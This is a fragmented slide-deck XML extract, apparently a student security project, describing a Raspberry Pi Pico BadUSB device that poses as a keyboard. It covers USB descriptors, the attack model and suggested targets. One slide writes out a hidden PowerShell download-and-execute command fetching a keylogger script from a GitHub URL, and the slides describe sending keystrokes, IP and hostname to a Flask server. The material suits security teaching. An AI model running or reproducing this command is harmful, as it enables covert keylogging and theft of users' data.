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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f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d3e958f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d3e958f2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ed3e958f2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d3e958f2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ed3e958f2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d3e958f2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ed3e958f2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d3e958f2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d3e958f2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d3e958f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d3e958f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d3e958f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d3e958f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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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d3e958f2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Raspberry Pi Pico-based BadUSB Attack</a:t>
            </a:r>
            <a:endParaRPr sz="3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 sends setup packets to request descriptors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First, device descriptor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Then, configuration + interface + hid + endpoint all at once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Lastly, HID report descriptor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descriptor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General info</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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273" y="1017725"/>
            <a:ext cx="6726077" cy="39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descriptor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Device power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625" y="1206728"/>
            <a:ext cx="6945375" cy="33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Descriptor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Identified as HID device</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>here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694" y="1017725"/>
            <a:ext cx="6338132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371" y="0"/>
            <a:ext cx="69672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 Report Descriptor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Specifies the format of data to be sent or received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keyboard: 8 bytes</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	1 for modifier keys (ctrl, shift, alt, windows)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	1 reserved</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	6 for pressed keys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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7561" l="26688" r="24521" t="12085"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1780016" y="0"/>
            <a:ext cx="5708508" cy="53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descriptors that identifies itself as an HID (Human Interface Device)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Specifically, a keyboard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Inject keystrokes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Download a powershell script to run a keylogger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Send keylogger data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 server that receives keystrokes periodically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TinyUSB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framework for microcontroller USB control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Allows sending custom descriptors when connected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Exposes callback functions when host requests for various descriptor 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Keystroke Injection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recognized as HID Keyboard, can send arbitrary key to the computer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Launch powershell script to download keylogger script online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Win + R, then “powershell -w h iwr 'https://raw.githubusercontent.com/map32/cybersecurity-badusb/main/hey2.ps1' | iex”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BadUSB?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demonstrated in 2014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USB thumb drives have firmware that communicates with the computer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Certain drives had reprogrammable firmware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Therefore, spoofing as different device is possible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Example) Disguising as a keyboard to inject arbitrary keystrokes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Keylogger script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Hooks onto keyboard input with SetWindowsHookEx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Sends out keystrokes every 10 seconds to a predetermined server, along with public IP and computer hostname information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Webserver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Flask server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data stored in json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“/post” POST endpoint to send data</a:t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650" y="2482888"/>
            <a:ext cx="52006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expanded to other HID devices - mouse, joysticks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Non-HID devices: can receive data from the host device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Disguise as WiFi Router, sniff packets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170" y="0"/>
            <a:ext cx="74416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 Model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2840525" y="2491375"/>
            <a:ext cx="1088400" cy="7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USB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994525" y="2491375"/>
            <a:ext cx="1088400" cy="7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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="77" name="Google Shape;77;p16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2461725" y="1425150"/>
            <a:ext cx="0" cy="29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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819725" y="2146475"/>
            <a:ext cx="1431600" cy="20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Keystrokes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="79" name="Google Shape;79;p16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="76" idx="3"/>
            <a:endCxn id="75" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082925" y="2860675"/>
            <a:ext cx="757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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142075" y="2491375"/>
            <a:ext cx="1088400" cy="7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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="75" idx="3"/>
            <a:endCxn id="80" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3928925" y="2860675"/>
            <a:ext cx="1213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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1745875" y="1370250"/>
            <a:ext cx="1431600" cy="20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Surface</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="83" name="Google Shape;83;p16"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="78" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4534625" y="2353775"/>
            <a:ext cx="900" cy="4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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5142125" y="3367575"/>
            <a:ext cx="12957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Arbitrary code execution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2736875" y="3367575"/>
            <a:ext cx="12957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Injection of keystrokes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994525" y="3367575"/>
            <a:ext cx="12957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Physical Access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Analysis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surface: physical access to computer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be inconspicuous: only requires couple seconds of access to an unattended computer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Innocent users can be fooled into plugging in the devices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Potential targets: computers in public spaces, any mailable addresses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Libraries, schools, etc…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Defense companies, governments, etc…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BadUSB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original exploit required a specific firmware (Phison 2307) which had vulnerabilities in its update protocol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firmware is not in use anymore - cannot use the exploit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Solution: use a microcontroller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Write code to respond itself as a keyboard device, then inject keystrokes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Raspberry Pi Pico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USB Protocol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SETUP Packets - sent from computer to request </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>descriptors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> from device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50" y="1736725"/>
            <a:ext cx="78390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Descriptors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about the device itself - its name, version, type of device, many more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host takes this information as granted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Possible to “fool” the computer simply by changing descriptors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Descriptor Types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descriptor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Configuration descriptor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Interface descriptor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Endpoint descriptor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HID descriptor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HID report descriptor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439" y="0"/>
            <a:ext cx="48985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